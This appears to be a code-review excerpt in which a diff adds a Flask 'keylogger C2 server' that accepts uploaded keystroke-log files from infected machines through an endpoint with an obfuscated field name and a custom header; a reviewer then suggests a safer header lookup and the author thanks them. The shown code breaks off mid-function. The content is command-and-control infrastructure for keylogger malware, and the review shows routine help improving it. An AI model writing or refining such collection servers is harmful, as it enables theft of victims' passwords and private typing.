klog_c2_server.py

```diff
@@ -0,0 +1,23 @@
+import os
+import base64
+from datetime import datetime
+from flask import Flask, flash,request, redirect, url_for
+from werkzeug.utils import secure_filename
+
+KLOG_UPLOAD_DIR = "" ##Keylogger File Dir goes here
+
+klog_server = Flask(__name__)
+klog_server.config['KLOG_UPLOAD_DIR'] = KLOG_UPLOAD_DIR
+
+@klog_server.route('/klog_endpoint',methods=['GET','POST','HEAD']) ##This is a place holder endpoint name; HEAD Method needed
+def klog_collect():
+	if request.method == 'POST':
+		klog_file =  request.files["bbe02f946d5455d74616fc9777557c22"]
+		header_list = request.headers.__getitem__('Sn')
```

Comment:
You should look into using
`request.headers.get('Sn')` I believe it's safer.
It'll return None if the header doesn't exist.

Reply:
Works well thanks, don't know why I was using that primitive there